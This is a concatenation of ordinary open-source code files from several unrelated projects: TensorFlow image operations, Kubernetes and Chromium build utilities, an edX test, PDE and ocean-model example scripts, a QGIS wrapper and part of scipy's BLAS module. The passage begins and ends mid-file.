structural similarity for image quality assessment." Signals, Systems and
Computers, 2004.
Arguments:
img1: First image batch.
img2: Second image batch. Must have the same rank as img1.
max_val: The dynamic range of the images (i.e., the difference between the
maximum the and minimum allowed values).
power_factors: Iterable of weights for each of the scales. The number of
scales used is the length of the list. Index 0 is the unscaled
resolution's weight and each increasing scale corresponds to the image
being downsampled by 2. Defaults to (0.0448, 0.2856, 0.3001, 0.2363,
0.1333), which are the values obtained in the original paper.
Returns:
A tensor containing an MS-SSIM value for each image in batch. The values
are in range [0, 1]. Returns a tensor with shape:
broadcast(img1.shape[:-3], img2.shape[:-3]).
"""
# Shape checking.
shape1 = img1.get_shape().with_rank_at_least(3)
shape2 = img2.get_shape().with_rank_at_least(3)
shape1[-3:].merge_with(shape2[-3:])
with ops.name_scope(None, 'MS-SSIM', [img1, img2]):
shape1, shape2, checks = _verify_compatible_image_shapes(img1, img2)
with ops.control_dependencies(checks):
img1 = array_ops.identity(img1)
# Need to convert the images to float32. Scale max_val accordingly so that
# SSIM is computed correctly.
max_val = math_ops.cast(max_val, img1.dtype)
max_val = convert_image_dtype(max_val, dtypes.float32)
img1 = convert_image_dtype(img1, dtypes.float32)
img2 = convert_image_dtype(img2, dtypes.float32)
imgs = [img1, img2]
shapes = [shape1, shape2]
# img1 and img2 are assumed to be a (multi-dimensional) batch of
# 3-dimensional images (height, width, channels). `heads` contain the batch
# dimensions, and `tails` contain the image dimensions.
heads = [s[:-3] for s in shapes]
tails = [s[-3:] for s in shapes]
divisor = [1, 2, 2, 1]
divisor_tensor = constant_op.constant(divisor[1:], dtype=dtypes.int32)
def do_pad(images, remainder):
padding = array_ops.expand_dims(remainder, -1)
padding = array_ops.pad(padding, [[1, 0], [1, 0]])
return [array_ops.pad(x, padding, mode='SYMMETRIC') for x in images]
mcs = []
for k in range(len(power_factors)):
with ops.name_scope(None, 'Scale%d' % k, imgs):
if k > 0:
# Avg pool takes rank 4 tensors. Flatten leading dimensions.
flat_imgs = [
array_ops.reshape(x, array_ops.concat([[-1], t], 0))
for x, t in zip(imgs, tails)
]
remainder = tails[0] % divisor_tensor
need_padding = math_ops.reduce_any(math_ops.not_equal(remainder, 0))
# pylint: disable=cell-var-from-loop
padded = control_flow_ops.cond(need_padding,
lambda: do_pad(flat_imgs, remainder),
lambda: flat_imgs)
# pylint: enable=cell-var-from-loop
downscaled = [nn_ops.avg_pool(x, ksize=divisor, strides=divisor,
padding='VALID')
for x in padded]
tails = [x[1:] for x in array_ops.shape_n(downscaled)]
imgs = [
array_ops.reshape(x, array_ops.concat([h, t], 0))
for x, h, t in zip(downscaled, heads, tails)
]
# Overwrite previous ssim value since we only need the last one.
ssim_per_channel, cs = _ssim_per_channel(*imgs, max_val=max_val)
mcs.append(nn_ops.relu(cs))
# Remove the cs score for the last scale. In the MS-SSIM calculation,
# we use the l(p) at the highest scale. l(p) * cs(p) is ssim(p).
mcs.pop() # Remove the cs score for the last scale.
mcs_and_ssim = array_ops.stack(mcs + [nn_ops.relu(ssim_per_channel)],
axis=-1)
# Take weighted geometric mean across the scale axis.
ms_ssim = math_ops.reduce_prod(math_ops.pow(mcs_and_ssim, power_factors),
[-1])
return math_ops.reduce_mean(ms_ssim, [-1]) # Avg over color channels.
@tf_export('image.image_gradients')
def image_gradients(image):
"""Returns image gradients (dy, dx) for each color channel.
Both output tensors have the same shape as the input: [batch_size, h, w,
d]. The gradient values are organized so that [I(x+1, y) - I(x, y)] is in
location (x, y). That means that dy will always have zeros in the last row,
and dx will always have zeros in the last column.
Arguments:
image: Tensor with shape [batch_size, h, w, d].
Returns:
Pair of tensors (dy, dx) holding the vertical and horizontal image
gradients (1-step finite difference).
Raises:
ValueError: If `image` is not a 4D tensor.
"""
if image.get_shape().ndims != 4:
raise ValueError('image_gradients expects a 4D tensor '
'[batch_size, h, w, d], not %s.', image.get_shape())
image_shape = array_ops.shape(image)
batch_size, height, width, depth = array_ops.unstack(image_shape)
dy = image[:, 1:, :, :] - image[:, :-1, :, :]
dx = image[:, :, 1:, :] - image[:, :, :-1, :]
# Return tensors with same size as original image by concatenating
# zeros. Place the gradient [I(x+1,y) - I(x,y)] on the base pixel (x, y).
shape = array_ops.stack([batch_size, 1, width, depth])
dy = array_ops.concat([dy, array_ops.zeros(shape, image.dtype)], 1)
dy = array_ops.reshape(dy, image_shape)
shape = array_ops.stack([batch_size, height, 1, depth])
dx = array_ops.concat([dx, array_ops.zeros(shape, image.dtype)], 2)
dx = array_ops.reshape(dx, image_shape)
return dy, dx
@tf_export('image.sobel_edges')
def sobel_edges(image):
"""Returns a tensor holding Sobel edge maps.
Arguments:
image: Image tensor with shape [batch_size, h, w, d] and type float32 or
float64. The image(s) must be 2x2 or larger.
Returns:
Tensor holding edge maps for each channel. Returns a tensor with shape
[batch_size, h, w, d, 2] where the last two dimensions hold [[dy[0], dx[0]],
[dy[1], dx[1]], ..., [dy[d-1], dx[d-1]]] calculated using the Sobel filter.
"""
# Define vertical and horizontal Sobel filters.
static_image_shape = image.get_shape()
image_shape = array_ops.shape(image)
kernels = [[[-1, -2, -1], [0, 0, 0], [1, 2, 1]],
[[-1, 0, 1], [-2, 0, 2], [-1, 0, 1]]]
num_kernels = len(kernels)
kernels = np.transpose(np.asarray(kernels), (1, 2, 0))
kernels = np.expand_dims(kernels, -2)
kernels_tf = constant_op.constant(kernels, dtype=image.dtype)
kernels_tf = array_ops.tile(kernels_tf, [1, 1, image_shape[-1], 1],
name='sobel_filters')
# Use depth-wise convolution to calculate edge maps per channel.
pad_sizes = [[0, 0], [1, 1], [1, 1], [0, 0]]
padded = array_ops.pad(image, pad_sizes, mode='REFLECT')
# Output tensor has shape [batch_size, h, w, d * num_kernels].
strides = [1, 1, 1, 1]
output = nn.depthwise_conv2d(padded, kernels_tf, strides, 'VALID')
# Reshape to [batch_size, h, w, d, num_kernels].
shape = array_ops.concat([image_shape, [num_kernels]], 0)
output = array_ops.reshape(output, shape=shape)
output.set_shape(static_image_shape.concatenate([num_kernels]))
return output
resize_area_deprecation = deprecation.deprecated(
date=None,
instructions=(
'Use `tf.image.resize(...method=ResizeMethod.AREA...)` instead.'))
tf_export(v1=['image.resize_area'])(
resize_area_deprecation(gen_image_ops.resize_area))
resize_bicubic_deprecation = deprecation.deprecated(
date=None,
instructions=(
'Use `tf.image.resize(...method=ResizeMethod.BICUBIC...)` instead.'))
tf_export(v1=['image.resize_bicubic'])(
resize_bicubic_deprecation(gen_image_ops.resize_bicubic))
resize_bilinear_deprecation = deprecation.deprecated(
date=None,
instructions=(
'Use `tf.image.resize(...method=ResizeMethod.BILINEAR...)` instead.'))
tf_export(v1=['image.resize_bilinear'])(
resize_bilinear_deprecation(gen_image_ops.resize_bilinear))
resize_nearest_neighbor_deprecation = deprecation.deprecated(
date=None,
instructions=(
'Use `tf.image.resize(...method=ResizeMethod.NEAREST_NEIGHBOR...)` '
'instead.'))
tf_export(v1=['image.resize_nearest_neighbor'])(
resize_nearest_neighbor_deprecation(gen_image_ops.resize_nearest_neighbor))
@tf_export('image.crop_and_resize', v1=[])
def crop_and_resize_v2(
image,
boxes,
box_indices,
crop_size,
method='bilinear',
extrapolation_value=0,
name=None):
"""Extracts crops from the input image tensor and resizes them.
Extracts crops from the input image tensor and resizes them using bilinear
sampling or nearest neighbor sampling (possibly with aspect ratio change) to a
common output size specified by `crop_size`. This is more general than the
`crop_to_bounding_box` op which extracts a fixed size slice from the input
image and does not allow resizing or aspect ratio change.
Returns a tensor with `crops` from the input `image` at positions defined at
the bounding box locations in `boxes`. The cropped boxes are all resized (with
bilinear or nearest neighbor interpolation) to a fixed
`size = [crop_height, crop_width]`. The result is a 4-D tensor
`[num_boxes, crop_height, crop_width, depth]`. The resizing is corner aligned.
In particular, if `boxes = [[0, 0, 1, 1]]`, the method will give identical
results to using `tf.image.resize_bilinear()` or
`tf.image.resize_nearest_neighbor()`(depends on the `method` argument) with
`align_corners=True`.
Args:
image: A 4-D tensor of shape `[batch, image_height, image_width, depth]`.
Both `image_height` and `image_width` need to be positive.
boxes: A 2-D tensor of shape `[num_boxes, 4]`. The `i`-th row of the tensor
specifies the coordinates of a box in the `box_ind[i]` image and is
specified in normalized coordinates `[y1, x1, y2, x2]`. A normalized
coordinate value of `y` is mapped to the image coordinate at `y *
(image_height - 1)`, so as the `[0, 1]` interval of normalized image
height is mapped to `[0, image_height - 1]` in image height coordinates.
We do allow `y1` > `y2`, in which case the sampled crop is an up-down
flipped version of the original image. The width dimension is treated
similarly. Normalized coordinates outside the `[0, 1]` range are allowed,
in which case we use `extrapolation_value` to extrapolate the input image
values.
box_indices: A 1-D tensor of shape `[num_boxes]` with int32 values in `[0,
batch)`. The value of `box_ind[i]` specifies the image that the `i`-th box
refers to.
crop_size: A 1-D tensor of 2 elements, `size = [crop_height, crop_width]`.
All cropped image patches are resized to this size. The aspect ratio of
the image content is not preserved. Both `crop_height` and `crop_width`
need to be positive.
method: An optional string specifying the sampling method for resizing. It
can be either `"bilinear"` or `"nearest"` and default to `"bilinear"`.
Currently two sampling methods are supported: Bilinear and Nearest
Neighbor.
extrapolation_value: An optional `float`. Defaults to `0`. Value used for
extrapolation, when applicable.
name: A name for the operation (optional).
Returns:
A 4-D tensor of shape `[num_boxes, crop_height, crop_width, depth]`.
"""
return gen_image_ops.crop_and_resize(
image, boxes, box_indices, crop_size, method, extrapolation_value, name)
crop_and_resize_deprecation = deprecation.deprecated_args(
None, 'box_ind is deprecated, use box_indices instead', 'box_ind')
tf_export(v1=['image.crop_and_resize'])(
crop_and_resize_deprecation(gen_image_ops.crop_and_resize))
|
SamuelMarks/kubernetes
|
refs/heads/master
|
build/json-extractor.py
|
413
|
#!/usr/bin/env python
# Copyright 2014 The Kubernetes Authors All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This is a very simple utility that reads a JSON document from stdin, parses it
# and returns the specified value. The value is described using a simple dot
# notation. If any errors are encountered along the way, an error is output and
# a failure value is returned.
from __future__ import print_function
import json
import sys
def PrintError(*err):
print(*err, file=sys.stderr)
def main():
try:
obj = json.load(sys.stdin)
except Exception, e:
PrintError("Error loading JSON: {0}".format(str(e)))
if len(sys.argv) == 1:
# if we don't have a query string, return success
return 0
elif len(sys.argv) > 2:
PrintError("Usage: {0} <json query>".format(sys.args[0]))
return 1
query_list = sys.argv[1].split('.')
for q in query_list:
if isinstance(obj, dict):
if q not in obj:
PrintError("Couldn't find '{0}' in dict".format(q))
return 1
obj = obj[q]
elif isinstance(obj, list):
try:
index = int(q)
except:
PrintError("Can't use '{0}' to index into array".format(q))
return 1
if index >= len(obj):
PrintError("Index ({0}) is greater than length of list ({1})".format(q, len(obj)))
return 1
obj = obj[index]
else:
PrintError("Trying to query non-queryable object: {0}".format(q))
return 1
if isinstance(obj, str):
print(obj)
else:
print(json.dumps(obj, indent=2))
if __name__ == "__main__":
sys.exit(main())
|
jswope00/griffinx
|
refs/heads/master
|
pavelib/paver_tests/test_paver_bok_choy_cmds.py
|
8
|
import os
import unittest
from pavelib.utils.test.suites.bokchoy_suite import BokChoyTestSuite
REPO_DIR = os.getcwd()
class TestPaverBokChoyCmd(unittest.TestCase):
def setUp(self):
self.request = BokChoyTestSuite('')
def _expected_command(self, expected_text_append, expected_default_store=None):
if expected_text_append:
expected_text_append = "/" + expected_text_append
expected_statement = ("DEFAULT_STORE={default_store} SCREENSHOT_DIR='{repo_dir}/test_root/log' "
"BOK_CHOY_HAR_DIR='{repo_dir}/test_root/log/hars' "
"SELENIUM_DRIVER_LOG_DIR='{repo_dir}/test_root/log' "
"nosetests {repo_dir}/common/test/acceptance/tests{exp_text} "
"--with-xunit "
"--xunit-file={repo_dir}/reports/bok_choy/xunit.xml "
"--verbosity=2 ".format(default_store=expected_default_store,
repo_dir=REPO_DIR,
exp_text=expected_text_append))
return expected_statement
def test_default_bokchoy(self):
self.assertEqual(self.request.cmd, self._expected_command(''))
def test_suite_request_bokchoy(self):
self.request.test_spec = "test_foo.py"
self.assertEqual(self.request.cmd, self._expected_command(self.request.test_spec))
def test_class_request_bokchoy(self):
self.request.test_spec = "test_foo.py:FooTest"
self.assertEqual(self.request.cmd, self._expected_command(self.request.test_spec))
def test_case_request_bokchoy(self):
self.request.test_spec = "test_foo.py:FooTest.test_bar"
self.assertEqual(self.request.cmd, self._expected_command(self.request.test_spec))
def test_default_bokchoy_with_draft_default_store(self):
self.request.test_spec = "test_foo.py"
self.request.default_store = "draft"
self.assertEqual(self.request.cmd, self._expected_command(self.request.test_spec, "draft"))
def test_default_bokchoy_with_invalid_default_store(self):
# the cmd will dumbly compose whatever we pass in for the default_store
self.request.test_spec = "test_foo.py"
self.request.default_store = "invalid"
self.assertEqual(self.request.cmd, self._expected_command(self.request.test_spec, "invalid"))
|
SaschaMester/delicium
|
refs/heads/master
|
build/android/gyp/pack_relocations.py
|
34
|
#!/usr/bin/env python
#
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Pack relocations in a library (or copy unchanged).
If --enable-packing and --configuration-name=='Release', invoke the
relocation_packer tool to pack the .rel.dyn or .rela.dyn section in the given
library files. This step is inserted after the libraries are stripped.
If --enable-packing is zero, the script copies files verbatim, with no
attempt to pack relocations.
Any library listed in --exclude-packing-list is also copied verbatim,
irrespective of any --enable-packing setting. Typically this would be
'libchromium_android_linker.so'.
"""
import optparse
import os
import shlex
import shutil
import sys
import tempfile
from util import build_utils
def PackLibraryRelocations(android_pack_relocations, library_path, output_path):
shutil.copy(library_path, output_path)
pack_command = [android_pack_relocations, output_path]
build_utils.CheckOutput(pack_command)
def CopyLibraryUnchanged(library_path, output_path):
shutil.copy(library_path, output_path)
def main(args):
args = build_utils.ExpandFileArgs(args)
parser = optparse.OptionParser()
build_utils.AddDepfileOption(parser)
parser.add_option('--clear-dir', action='store_true',
help='If set, the destination directory will be deleted '
'before copying files to it. This is highly recommended to '
'ensure that no stale files are left in the directory.')
parser.add_option('--configuration-name',
default='Release',
help='Gyp configuration name (i.e. Debug, Release)')
parser.add_option('--enable-packing',
choices=['0', '1'],
help=('Pack relocations if 1 and configuration name is \'Release\','
' otherwise plain file copy'))
parser.add_option('--exclude-packing-list',
default='',
help='Names of any libraries explicitly not packed')
parser.add_option('--android-pack-relocations',
help='Path to the relocations packer binary')
parser.add_option('--stripped-libraries-dir',
help='Directory for stripped libraries')
parser.add_option('--packed-libraries-dir',
help='Directory for packed libraries')
parser.add_option('--libraries', action='append',
help='List of libraries')
parser.add_option('--stamp', help='Path to touch on success')
options, _ = parser.parse_args(args)
enable_packing = (options.enable_packing == '1' and
options.configuration_name == 'Release')
exclude_packing_set = set(shlex.split(options.exclude_packing_list))
libraries = []
for libs_arg in options.libraries:
libraries += build_utils.ParseGypList(libs_arg)
if options.clear_dir:
build_utils.DeleteDirectory(options.packed_libraries_dir)
build_utils.MakeDirectory(options.packed_libraries_dir)
for library in libraries:
library_path = os.path.join(options.stripped_libraries_dir, library)
output_path = os.path.join(
options.packed_libraries_dir, os.path.basename(library))
if enable_packing and library not in exclude_packing_set:
PackLibraryRelocations(options.android_pack_relocations,
library_path,
output_path)
else:
CopyLibraryUnchanged(library_path, output_path)
if options.depfile:
build_utils.WriteDepfile(
options.depfile,
libraries + build_utils.GetPythonDependencies())
if options.stamp:
build_utils.Touch(options.stamp)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
AOSPU/external_chromium_org
|
refs/heads/android-5.0/py3
|
build/android/pylib/perf/cache_control.py
|
8
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from pylib import android_commands
from pylib.device import device_utils
class CacheControl(object):
_DROP_CACHES = '/proc/sys/vm/drop_caches'
def __init__(self, device):
# TODO(jbudorick) Remove once telemetry gets switched over.
if isinstance(device, android_commands.AndroidCommands):
device = device_utils.DeviceUtils(device)
self._device = device
def DropRamCaches(self):
"""Drops the filesystem ram caches for performance testing."""
self._device.RunShellCommand('sync', root=True)
self._device.old_interface.SetProtectedFileContents(
CacheControl._DROP_CACHES, '3')
|
riemarc/pyinduct
|
refs/heads/develop
|
pyinduct/examples/rad_eq_diri_fem.py
|
3
|
import numpy as np
import pyinduct as pi
import pyinduct.parabolic as parabolic
def run(show_plots):
n_fem = 17
T = 1
l = 1
y0 = -1
y1 = 4
param = [1, 0, 0, None, None]
# or try these:
# param = [1, -0.5, -8, None, None] # :)))
a2, a1, a0, _, _ = param
temp_domain = pi.Domain(bounds=(0, T), num=100)
spat_domain = pi.Domain(bounds=(0, l), num=n_fem * 11)
# initial and test functions
nodes = pi.Domain(spat_domain.bounds, num=n_fem)
fem_base = pi.LagrangeFirstOrder.cure_interval(nodes)
act_fem_base = pi.Base(fem_base[-1])
not_act_fem_base = pi.Base(fem_base[1:-1])
vis_fems_base = pi.Base(fem_base)
pi.register_base("act_base", act_fem_base)
pi.register_base("sim_base", not_act_fem_base)
pi.register_base("vis_base", vis_fems_base)
# trajectory
u = parabolic.RadFeedForward(l, T,
param_original=param,
bound_cond_type="dirichlet",
actuation_type="dirichlet",
y_start=y0, y_end=y1)
# weak form
x = pi.FieldVariable("sim_base")
x_dt = x.derive(temp_order=1)
x_dz = x.derive(spat_order=1)
phi = pi.TestFunction("sim_base")
phi_dz = phi.derive(1)
act_phi = pi.ScalarFunction("act_base")
act_phi_dz = act_phi.derive(1)
weak_form = pi.WeakFormulation([
# ... of the homogeneous part of the system
pi.IntegralTerm(pi.Product(x_dt, phi),
limits=spat_domain.bounds),
pi.IntegralTerm(pi.Product(x_dz, phi_dz),
limits=spat_domain.bounds,
scale=a2),
pi.IntegralTerm(pi.Product(x_dz, phi),
limits=spat_domain.bounds,
scale=-a1),
pi.IntegralTerm(pi.Product(x, phi),
limits=spat_domain.bounds,
scale=-a0),
# ... of the inhomogeneous part of the system
pi.IntegralTerm(pi.Product(pi.Product(act_phi, phi),
pi.Input(u, order=1)),
limits=spat_domain.bounds),
pi.IntegralTerm(pi.Product(pi.Product(act_phi_dz, phi_dz),
pi.Input(u)),
limits=spat_domain.bounds,
scale=a2),
pi.IntegralTerm(pi.Product(pi.Product(act_phi_dz, phi),
pi.Input(u)),
limits=spat_domain.bounds,
scale=-a1),
pi.IntegralTerm(pi.Product(pi.Product(act_phi, phi),
pi.Input(u)),
limits=spat_domain.bounds,
scale=-a0)],
name="main_system")
# system matrices \dot x = A x + b0 u + b1 \dot u
cf = pi.parse_weak_formulation(weak_form)
ss = pi.create_state_space(cf)
a_mat = ss.A[1]
b0 = ss.B[0][1]
b1 = ss.B[1][1]
# transformation into \dot \bar x = \bar A \bar x + \bar b u
a_tilde = np.diag(np.ones(a_mat.shape[0]), 0)
a_tilde_inv = np.linalg.inv(a_tilde)
a_bar = (a_tilde @ a_mat) @ a_tilde_inv
b_bar = a_tilde @ (a_mat @ b1) + b0
# simulation
def x0(z):
return 0 + y0 * z
start_func = pi.Function(x0, domain=spat_domain.bounds)
full_start_state = np.array([pi.project_on_base(start_func,
pi.get_base("vis_base")
)]).flatten()
initial_state = full_start_state[1:-1]
start_state_bar = a_tilde @ initial_state - (b1 * u(time=0)).flatten()
ss = pi.StateSpace(a_bar, b_bar, base_lbl="sim", input_handle=u)
sim_temp_domain, sim_weights_bar = pi.simulate_state_space(ss,
start_state_bar,
temp_domain)
# back-transformation
u_vec = np.reshape(u.get_results(sim_temp_domain), (len(temp_domain), 1))
sim_weights = sim_weights_bar @ a_tilde_inv + u_vec @ b1.T
# visualisation
plots = list()
save_pics = False
vis_weights = np.hstack((np.zeros_like(u_vec), sim_weights, u_vec))
eval_d = pi.evaluate_approximation("vis_base",
vis_weights,
sim_temp_domain,
spat_domain,
spat_order=0)
der_eval_d = pi.evaluate_approximation("vis_base",
vis_weights,
sim_temp_domain,
spat_domain,
spat_order=1)
if show_plots:
plots.append(pi.PgAnimatedPlot(eval_d,
labels=dict(left='x(z,t)', bottom='z'),
save_pics=save_pics))
plots.append(pi.PgAnimatedPlot(der_eval_d,
labels=dict(left='x\'(z,t)', bottom='z'),
save_pics=save_pics))
win1 = pi.surface_plot(eval_d, title="x(z,t)")
win2 = pi.surface_plot(der_eval_d, title="x'(z,t)")
# save pics
if save_pics:
path = pi.save_2d_pg_plot(u.get_plot(), 'rad_dirichlet_traj')[1]
win1.gl_widget.grabFrameBuffer().save(path + 'rad_dirichlet_3d_x.png')
win2.gl_widget.grabFrameBuffer().save(path + 'rad_dirichlet_3d_dx.png')
pi.show()
pi.tear_down(("act_base", "sim_base", "vis_base"))
if __name__ == "__main__":
run(True)
|
kshedstrom/pyroms
|
refs/heads/master
|
examples/Arctic_HYCOM/make_bdry_file.py
|
1
|
import matplotlib
matplotlib.use('Agg')
import subprocess
import os
import sys
import commands
import numpy as np
from multiprocessing import Pool
#import pdb
#increase the maximum number of open files allowed
#import resource
#resource.setrlimit(resource.RLIMIT_NOFILE, (3000,-1))
import pyroms
import pyroms_toolbox
from remap_bdry import remap_bdry
from remap_bdry_uv import remap_bdry_uv
lst_year = sys.argv[1:]
data_dir = '/archive/u1/uaf/kate/HYCOM/Svalbard/data/'
dst_dir='./'
lst_file = []
for year in lst_year:
# lst = commands.getoutput('ls ' + data_dir + 'HYCOM_GLBa0.08_' + year + '*')
lst = commands.getoutput('ls ' + data_dir + 'HYCOM_GLBa0.08_' + year + '_0*')
# lst = commands.getoutput('ls ' + data_dir + 'HYCOM_GLBa0.08_' + year + '_0[4-9]*')
lst = lst.split()
lst_file = lst_file + lst
print 'Build OBC file from the following file list:'
print lst_file
print ' '
src_grd_file = data_dir + '../HYCOM_GLBa0.08_North_grid2.nc'
src_grd = pyroms_toolbox.Grid_HYCOM.get_nc_Grid_HYCOM(src_grd_file)
dst_grd = pyroms.grid.get_ROMS_grid('ARCTIC2')
def do_file(file):
zeta = remap_bdry(file, 'ssh', src_grd, dst_grd, dst_dir=dst_dir)
dst_grd2 = pyroms.grid.get_ROMS_grid('ARCTIC2', zeta=zeta)
remap_bdry(file, 'temp', src_grd, dst_grd2, dst_dir=dst_dir)
remap_bdry(file, 'salt', src_grd, dst_grd2, dst_dir=dst_dir)
# pdb.set_trace()
remap_bdry_uv(file, src_grd, dst_grd2, dst_dir=dst_dir)
# merge file
bdry_file = dst_dir + file.rsplit('/')[-1][:-3] + '_bdry_' + dst_grd.name + '.nc'
out_file = dst_dir + file.rsplit('/')[-1][:-3] + '_ssh_bdry_' + dst_grd.name + '.nc'
command = ('ncks', '-a', '-O', out_file, bdry_file)
subprocess.check_call(command)
os.remove(out_file)
out_file = dst_dir + file.rsplit('/')[-1][:-3] + '_temp_bdry_' + dst_grd.name + '.nc'
command = ('ncks', '-a', '-A', out_file, bdry_file)
subprocess.check_call(command)
os.remove(out_file)
out_file = dst_dir + file.rsplit('/')[-1][:-3] + '_salt_bdry_' + dst_grd.name + '.nc'
command = ('ncks', '-a', '-A', out_file, bdry_file)
subprocess.check_call(command)
os.remove(out_file)
out_file = dst_dir + file.rsplit('/')[-1][:-3] + '_u_bdry_' + dst_grd.name + '.nc'
command = ('ncks', '-a', '-A', out_file, bdry_file)
subprocess.check_call(command)
os.remove(out_file)
out_file = dst_dir + file.rsplit('/')[-1][:-3] + '_v_bdry_' + dst_grd.name + '.nc'
command = ('ncks', '-a', '-A', out_file, bdry_file)
subprocess.check_call(command)
os.remove(out_file)
processes = 4
p = Pool(processes)
results = p.map(do_file, lst_file)
|
sikmir/QGIS
|
refs/heads/master
|
python/plugins/processing/algs/grass7/ext/r_li_mps.py
|
45
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
r_li_mps.py
-----------
Date : February 2016
Copyright : (C) 2016 by Médéric Ribreux
Email : medspx at medspx dot fr
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Médéric Ribreux'
__date__ = 'February 2016'
__copyright__ = '(C) 2016, Médéric Ribreux'
from .r_li import checkMovingWindow, configFile
def checkParameterValuesBeforeExecuting(alg, parameters, context):
return checkMovingWindow(alg, parameters, context)
def processCommand(alg, parameters, context, feedback):
configFile(alg, parameters, context, feedback)
|
andim/scipy
|
refs/heads/master
|
scipy/linalg/blas.py
|
4
|
"""
Low-level BLAS functions (:mod:`scipy.linalg.blas`)
===================================================
This module contains low-level functions from the BLAS library.
.. versionadded:: 0.12.0
.. warning::
These functions do little to no error checking.
It is possible to cause crashes by mis-using them,
so prefer using the higher-level routines in `scipy.linalg`.
Finding functions
-----------------
.. autosummary::
:toctree: generated/
get_blas_funcs
find_best_blas_type
BLAS Level 1 functions
----------------------
.. autosummary::
:toctree: generated/
caxpy
ccopy
cdotc
cdotu
crotg
cscal
csrot
csscal
cswap
dasum
daxpy
dcopy
ddot
dnrm2
drot
drotg
drotm
drotmg
dscal
dswap
dzasum
dznrm2
icamax
idamax
isamax
izamax
sasum
saxpy
scasum
scnrm2
scopy
sdot
snrm2
srot
srotg
srotm
srotmg
sscal
sswap
zaxpy
zcopy
zdotc
zdotu
zdrot
zdscal
zrotg
zscal
zswap
BLAS Level 2 functions
----------------------
.. autosummary::
:toctree: generated/
cgemv
cgerc
cgeru
chemv
ctrmv
csyr
cher
cher2
dgemv
dger
dsymv
dtrmv
dsyr
dsyr2
sgemv
sger
ssymv
strmv
ssyr
ssyr2
zgemv
zgerc
zgeru
zhemv
ztrmv
zsyr
zher
zher2
BLAS Level 3 functions
----------------------
.. autosummary::
:toctree: generated/
cgemm
chemm
cherk
cher2k
csymm
csyrk
csyr2k
dgemm
dsymm
dsyrk
dsyr2k
sgemm
ssymm
ssyrk
ssyr2k
zgemm
zhemm
zherk
zher2k
zsymm
zsyrk
zsyr2k
"""
#
# Author: Pearu Peterson, March 2002
# refactoring by Fabian Pedregosa, March 2010
#
from __future__ import division, print_function, absolute_import
__all__ = ['get_blas_funcs', 'find_best_blas_type']
import numpy as _np
from scipy.linalg import _fblas
try:
from scipy.linalg import _cblas
except ImportError:
_cblas = None
# Expose all functions (only fblas --- cblas is an implementation detail)
empty_module = None
from scipy.linalg._fblas import *
del empty_module
# 'd' will be default for 'i',..
_type_conv = {'f': 's', 'd': 'd', 'F': 'c', 'D': 'z', 'G': 'z'}
# some convenience alias for complex functions
_blas_alias = {'cnrm2': 'scnrm2', 'znrm2': 'dznrm2',
'cdot': 'cdotc', 'zdot': 'zdotc',
'cger': 'cgerc', 'zger': 'zgerc',
'sdotc': 'sdot', 'sdotu': 'sdot',
'ddotc': 'ddot', 'ddotu': 'ddot'}
def find_best_blas_type(arrays=(), dtype=None):
"""Find best-matching BLAS/LAPACK type.
Arrays are used to determine the optimal prefix of BLAS routines.
Parameters
----------
arrays : sequence of ndarrays, optional
Arrays can be given to determine optimal prefix of BLAS
routines. If not given, double-precision routines will be
used, otherwise the most generic type in arrays will be used.
dtype : str or dtype, optional
Data-type specifier. Not used if `arrays` is non-empty.
Returns
-------
prefix : str
BLAS/LAPACK prefix character.
dtype : dtype
Inferred Numpy data type.
prefer_fortran : bool
Whether to prefer Fortran order routines over C order.
"""
dtype = _np.dtype(dtype)
prefer_fortran = False
if arrays:
# use the most generic type in arrays
dtypes = [ar.dtype for ar in arrays]
dtype = _np.find_common_type(dtypes, ())
try:
index = dtypes.index(dtype)
except ValueError:
index = 0
if arrays[index].flags['FORTRAN']:
# prefer Fortran for leading array with column major order
prefer_fortran = True
prefix = _type_conv.get(dtype.char, 'd')
return prefix, dtype, prefer_fortran
def _get_funcs(names, arrays, dtype,
lib_name, fmodule, cmodule,
fmodule_name, cmodule_name, alias):
"""
Return available BLAS/LAPACK functions.
Used also in lapack.py. See get_blas_funcs for docstring.
"""
funcs = []
unpack = False
dtype = _np.dtype(dtype)
module1 = (cmodule, cmodule_name)
module2 = (fmodule, fmodule_name)
if isinstance(names, str):
names = (names,)
unpack = True
prefix, dtype, prefer_fortran = find_best_blas_type(arrays, dtype)
if prefer_fortran:
module1, module2 = module2, module1
for i, name in enumerate(names):
func_name = prefix + name
func_name = alias.get(func_name, func_name)
func = getattr(module1[0], func_name, None)
module_name = module1[1]
if func is None:
func = getattr(module2[0], func_name, None)
module_name = module2[1]
if func is None:
raise ValueError(
'%s function %s could not be found' % (lib_name, func_name))
func.module_name, func.typecode = module_name, prefix
func.dtype = dtype
func.prefix = prefix # Backward compatibility
funcs.append(func)
if unpack:
return funcs[0]
else:
return funcs
def get_blas_funcs(names, arrays=(), dtype=None):
"""Return available BLAS function objects from names.
Arrays are used to determine the optimal prefix of BLAS routines.
Parameters
----------
names : str or sequence of str
Name(s) of BLAS functions without type prefix.
arrays : sequence of ndarrays, optional
Arrays can be given to determine optimal prefix of BLAS
routines. If not given, double-precision routines will be
used, otherwise the most generic type in arrays will be used.
dtype : str or dtype, optional
Data-type specifier. Not used if `arrays` is non-empty.
Returns
-------
funcs : list
List containing the found function(s).
Notes
-----
This routine automatically chooses between Fortran/C
interfaces. Fortran code is used whenever possible for arrays with
column major order. In all other cases, C code is preferred.
In BLAS, the naming convention is that all functions start with a
type prefix, which depends on the type of the principal
matrix. These can be one of {'s', 'd', 'c', 'z'} for the numpy
types {float32, float64, complex64, complex128} respectively.
The code and the dtype are stored in attributes `typecode` and `dtype`
of the returned functions.
"""
return _get_funcs(names, arrays, dtype,
